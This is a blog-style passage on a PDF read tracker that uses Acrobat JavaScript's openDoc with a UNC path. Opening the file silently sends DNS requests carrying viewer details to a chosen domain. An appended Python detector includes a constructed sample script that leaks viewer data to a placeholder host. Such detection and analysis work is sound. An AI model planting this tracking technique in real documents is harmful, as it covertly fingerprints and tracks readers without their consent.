In the code I dealt with, openDoc was passed the arguments “cPath”, “cFS” and “bHidden”. Below is an explanation of each argument:
- cPath – the location of the document/path
- cFS – the file system type to use
- bHidden – whether or not to open the document at that path
The code I encountered set the cPath to something like “\\your.domain.to.query\/path/
If executed, the document would not prompt the user, and a stream of DNS requests to the specified domain would follow. What was nice about this read tracker was that it went further and collected some information about the client, though ultimately not all of it. I tooled this up for testing and added the following client details to what is collected:
- ViewerType – Type of viewer the user is reading (Adobe, Web, etc.)
- ViewVersion – Version of the PDF reader
- AppLanguage – The PDF reader’s configured language
- AppPlatform – Operating system used to open the PDF
I appended these to the actual DNS request so that it looked like this:
In the blog McAfee put out, they show HTTP traffic, but I was never able to get such details. Possibly I have missed something, they are using a different call altogether, or Adobe 11 simply handles this call differently. If you are interested in playing around with the code and a sample document, please email me or obtain the sample from VirusTotal.
I generated the sample using HeavyPint and the code pictured above, without any exploit, so it is safe.
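For anyone triaging PDFs for this kind of read tracker, the following is an added example (my own code, not from the post or the sample document): given JavaScript already extracted from a PDF, it flags openDoc calls whose cPath is a UNC path and lists which viewer-fingerprint properties the script reads. The sample script and the tracker.example domain are constructed for the demonstration; app.viewerType, app.viewerVersion, app.language and app.platform are the Acrobat JavaScript properties behind the ViewerType/ViewVersion/AppLanguage/AppPlatform fields listed above.

```python
"""Static check for Acrobat-JavaScript read trackers that open a UNC path."""
import re

# Acrobat 'app' properties behind the fingerprint fields listed in the post.
FINGERPRINT_PROPS = ("app.viewerType", "app.viewerVersion",
                     "app.language", "app.platform")

# openDoc(...) and its argument text; assumes no nested parentheses in the call.
OPENDOC_CALL = re.compile(r"openDoc\s*\(([^)]*)\)", re.S)
# A string literal starting with two or more backslashes, i.e. a UNC path
# (in JavaScript source the two leading backslashes are normally written as four).
UNC_LITERAL = re.compile(r"""["'](\\{2,}[^"']*)["']""")


def scan_acrobat_js(js: str) -> dict:
    """Return UNC openDoc targets and fingerprint reads found in extracted JS."""
    targets = []
    for call in OPENDOC_CALL.finditer(js):
        args = call.group(1)
        for lit in UNC_LITERAL.finditer(args):
            raw = lit.group(1).lstrip("\\")
            host = re.split(r"[\\/]", raw, maxsplit=1)[0]
            # An empty host means the name is assembled at run time, which is
            # how collected details end up inside the DNS query.
            targets.append({"host": host or "<dynamic>",
                            "dynamic": "+" in args})  # crude concatenation check
    props = [p for p in FINGERPRINT_PROPS if p in js]
    return {"unc_targets": targets,
            "fingerprint_props": props,
            # UNC open plus fingerprint reads is the tracker pattern from the post.
            "read_tracker": bool(targets) and bool(props)}


# Constructed sample in the shape the post describes (placeholder domain).
SAMPLE_JS = r"""
var tag = app.viewerType + "-" + app.viewerVersion + "-" + app.platform;
app.openDoc({cPath: "\\\\" + tag + ".tracker.example\\share\\x.pdf",
             cFS: "DOS", bHidden: true});
"""

if __name__ == "__main__":
    print(scan_acrobat_js(SAMPLE_JS))
```

Extracting the JavaScript from the PDF objects (including decompressing streams) is left to whatever PDF parser you already use; this only inspects the script text.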